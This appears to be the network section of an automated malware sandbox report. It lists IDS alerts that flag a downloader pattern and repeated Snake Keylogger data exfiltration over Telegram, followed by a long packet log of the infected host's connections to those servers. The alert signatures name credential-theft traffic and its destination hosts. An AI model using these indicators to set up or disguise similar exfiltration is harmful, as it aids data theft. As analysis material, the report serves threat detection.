English | United States | |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-19T15:29:23.912768+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49713 | 216.58.208.238 | 443 | TCP |
2024-12-19T15:29:31.912821+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49733 | 132.226.247.73 | 80 | TCP |
2024-12-19T15:29:40.006658+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49733 | 132.226.247.73 | 80 | TCP |
2024-12-19T15:29:42.161159+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49756 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:43.850430+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49761 | 132.226.247.73 | 80 | TCP |
2024-12-19T15:29:45.902560+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49766 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:49.397276+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49776 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:52.938425+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49785 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:56.563595+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49796 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:00.031933+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49806 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:08.989401+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49827 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:21.477445+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49859 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:25.990535+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49871 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:30.719693+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49883 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:34.215299+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49893 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:37.686699+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49904 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:42.399185+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49917 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:45.840863+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49925 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:50.316155+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49937 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:53.779170+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49947 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:57.250331+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49955 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:31:01.789509+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49967 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:31:07.086493+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49979 | 149.154.167.220 | 443 | TCP |
Dec 19, 2024 15:29:54.438038111 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:54.438082933 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:54.438169956 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:54.438515902 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:54.438532114 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:54.491185904 CET | 49791 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:29:55.802407980 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:55.804356098 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:55.804382086 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:55.804439068 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:55.804446936 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:56.563637018 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:56.563721895 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:56.563791990 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:56.564399004 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:56.568147898 CET | 49791 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:29:56.569798946 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:29:56.688025951 CET | 80 | 49791 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:29:56.688153982 CET | 49791 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:29:56.689335108 CET | 80 | 49802 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:29:56.689431906 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:29:56.689657927 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:29:56.809374094 CET | 80 | 49802 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:29:58.008605003 CET | 80 | 49802 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:29:58.009996891 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:58.010023117 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:58.010133982 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:58.010354996 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:58.010368109 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:58.053689003 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:29:59.377213001 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:59.379338980 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:59.379369974 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:29:59.379435062 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:29:59.379447937 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:00.032085896 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:00.032321930 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:00.032396078 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:00.032768011 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:00.035564899 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:00.036631107 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:00.155639887 CET | 80 | 49802 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:00.155714035 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:00.156308889 CET | 80 | 49811 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:00.156387091 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:00.156553030 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:00.276015997 CET | 80 | 49811 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:06.891166925 CET | 80 | 49811 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:06.896367073 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:06.896414995 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:06.896529913 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:06.896843910 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:06.896857977 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:06.944386959 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:08.273334980 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:08.311199903 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:08.311223984 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:08.311295986 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:08.311309099 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:08.989456892 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:08.989543915 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:08.989599943 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:08.992734909 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:09.010977983 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:09.011718035 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:09.130956888 CET | 80 | 49811 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:09.131035089 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:09.131282091 CET | 80 | 49833 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:09.131510019 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:09.131577969 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:09.251094103 CET | 80 | 49833 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:19.378699064 CET | 80 | 49833 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:19.382277012 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:19.382327080 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:19.382404089 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:19.382777929 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:19.382797956 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:19.428885937 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:20.747720003 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:20.756915092 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:20.756942034 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:20.757025957 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:20.757031918 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:21.477467060 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:21.477546930 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:21.477884054 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:21.478233099 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:21.481369972 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:21.482552052 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:21.602557898 CET | 80 | 49833 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:21.602797985 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:21.603389978 CET | 80 | 49864 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:21.603477955 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:21.603665113 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:21.724695921 CET | 80 | 49864 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:23.809283972 CET | 80 | 49864 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:23.810745955 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:23.810843945 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:23.810933113 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:23.811290979 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:23.811336040 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:23.850812912 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:25.288039923 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:25.290431976 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:25.290472984 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:25.290555000 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:25.290563107 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:25.990530968 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:25.990659952 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:25.990716934 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:25.991950035 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:26.069467068 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:26.085270882 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:26.189518929 CET | 80 | 49864 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:26.189610958 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:26.204895020 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:26.204981089 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:26.205121994 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:26.324682951 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:28.553240061 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:28.554733992 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:28.554773092 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:28.554846048 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:28.555171967 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:28.555183887 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:28.600929022 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:29.940500975 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:29.943120956 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:29.943140030 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:29.943218946 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:29.943226099 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:30.719856977 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:30.720060110 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:30.720228910 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:30.720916033 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:30.723964930 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:30.725259066 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:30.844985962 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:30.845069885 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:30.845813036 CET | 80 | 49889 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:30.845905066 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:30.846122026 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:30.965703964 CET | 80 | 49889 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:32.161087990 CET | 80 | 49889 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:32.164324045 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:32.164388895 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:32.164454937 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:32.165154934 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:32.165172100 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:32.210257053 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:33.572365046 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:33.574161053 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:33.574187040 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:33.574289083 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:33.574295044 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:34.215250969 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:34.215353966 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:34.215418100 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:34.215739965 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:34.247724056 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:34.251152039 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:34.367753983 CET | 80 | 49889 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:34.367851973 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:34.370874882 CET | 80 | 49899 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:34.371054888 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:34.371108055 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:34.490592957 CET | 80 | 49899 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:35.676954031 CET | 80 | 49899 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:35.678487062 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:35.678513050 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:35.678584099 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:35.678819895 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:35.678834915 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:35.725903034 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:37.042073011 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:37.043701887 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:37.043714046 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:37.043813944 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:37.043818951 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:37.686759949 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:37.686839104 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:37.686894894 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:37.687309027 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:37.690104961 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:37.691200972 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:37.810028076 CET | 80 | 49899 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:37.810127020 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:37.810930014 CET | 80 | 49908 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:37.811012030 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:37.811099052 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:37.932337046 CET | 80 | 49908 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:40.115158081 CET | 80 | 49908 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:40.163434982 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:40.337979078 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:40.338046074 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:40.338135004 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:40.338432074 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:40.338460922 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:41.711440086 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:41.713712931 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:41.713746071 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:41.713807106 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:41.713815928 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:42.399276018 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:42.399373055 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:42.399435997 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:42.399776936 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:42.402996063 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:42.403621912 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:42.522934914 CET | 80 | 49908 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:42.523000002 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:42.523129940 CET | 80 | 49923 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:42.523219109 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:42.523655891 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:42.643117905 CET | 80 | 49923 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:43.826448917 CET | 80 | 49923 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:43.828835964 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:43.828861952 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:43.828952074 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:43.829175949 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:43.829189062 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:43.882224083 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:45.196583033 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:45.198499918 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:45.198514938 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:45.198600054 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:45.198610067 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:45.840930939 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:45.841039896 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:45.841094017 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:45.841927052 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:45.855632067 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:45.857657909 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:45.975850105 CET | 80 | 49923 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:45.975955009 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:45.977206945 CET | 80 | 49931 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:45.977289915 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:45.977520943 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:46.097132921 CET | 80 | 49931 | 132.226.247.73 | 192.168.2.5 |
